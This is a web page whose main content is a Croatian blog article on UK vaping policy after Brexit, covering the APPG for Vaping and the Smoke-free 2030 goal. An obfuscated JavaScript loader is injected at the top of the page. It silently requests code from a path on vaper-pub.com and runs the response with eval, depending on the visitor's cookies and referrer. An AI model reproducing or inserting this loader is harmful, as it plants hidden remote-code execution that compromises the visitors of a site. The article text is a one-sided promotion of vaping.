;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Engleska bez duhanskog dima do 2030. godine

Engleska bez duhanskog dima do 2030. godine

Kao što svi znamo, Engleska je uspješno napustila Europsku uniju, a u praksi to znači da pored mnogih promjena u Velikoj Britaniji možemo vidjeti i nacrte novih zakona i pravila koji se razlikuju od EU regulativa. Neke od novih ideja odnose se i na korištenje e cigareta te smo ih odlučili detaljnije proučiti.

APPG FOR VAPING – Organizacija koja promovira e cigarete

Mark Pawsey koji je od nastanka e cigareta bio zainteresiran za njihove prednosti u odnosu na klasične cigarete odlučio je 2014. godine osnovati APPG (All-Party Parliamentary Group) for Vaping.

Svrha ove organizacije je prvenstveno predstaviti članovima parlamenta parenje kao bolju alternativu naspram pušenja kako bi se ova tehnologija čim uspješnije iskoristila u svrhu pomoći pušačima da bi prestali koristiti klasične cigarete.

Ipak, do nedavno se Velika Britanija morala držati EU zakona vezanih za duhanske proizvode što je zatvaralo vrata drugačijim i potencijalno boljim pristupima. Broj ljudi koji su iz godine u godinu prelazili na parenje se nastavio eksponencijalno smanjivati nakon uvođenja restrikcija u vidu veličine bočica e tekućine, količine nikotina u tekućinama, kapacitetu atomizera itd.

Pored toga, parenje je u medijima često predstavljeno na netočan i veoma negativan način zbog kojeg se potencijalni korisnici e cigareta susreću s predrasudama i dezinformacijama koje izazivaju taman dovoljno straha da se drže daleko opasnije opcije u vidu pušenja, umjesto da pređu na sigurniju alternativu.

Što se promijenilo 2021. godine?

Ova je godina potencijalno prijelomna za korisnike e cigareta u Engleskoj jer je Brexit donio niz mogućnosti odstupanja od dotadašnjih EU regulativa. Osim što je predstavljen novi Smoke-free cilj koji bi se trebao ostvariti do 2030. godine, APPG je odlučio parlamentu predstaviti novi plan koji se uvelike oslanja na parenje kao jedan od načina da Velika Britanija uistinu postane zemlja bez duhanskog dima.

27. travnja 2021. parlament je zahtijevao pismene dokaze koji potvrđuju da je parenje uistinu pravi način za skidanje korisnika s klasičnih cigareta te je kreirana web stranica na kojoj su se ovakvi dokazi mogli objavljivati.

Stranicu na kojoj su objave o manjoj štetnosti e cigareta možete pogledati klikom na link.

Pored APPG-a, tri su značajne organizacije doprinijele sa svojom verzijom nacrta novog zakona – The Royal College of Physicians, the New Nicotine Alliance i Institut Adam Smith.

Budućnost parenja u Velikoj Britaniji

Iako za sada još ne znamo u kojoj mjeri će se postojeći zakoni promijeniti, vidimo da Velika Britanija trenutno itekako razmatra parenje kao dio plana za ostvarenje Smoke-free Engleske.

Sjetimo se da je Engleska bila prva zemlja koja je uvela pravilo po kojem je pušač imao pravo na besplatnu e cigaretu u ljekarni ukoliko je svom liječniku izrazio želju za prestankom pušenja. Osim toga, upravo su se brojni britanski instituti među prvima oglasili u periodu kada je još uvijek bilo upitno jesu li elektronske cigarete uistinu manje štetne od klasičnih i od njih smo, između ostalih, dobili podatak da je parenje 95% manje štetno od pušenja.

Vidjet ćemo hoće li se ovaj trend nastaviti i u budućnosti, ali za sada stvari upućuju na to da bi Velika Britanija mogla uistinu biti jedna od zemalja s najpozitivnijim stavom prema parenju na svijetu.

Choose your Reaction!
Leave a Comment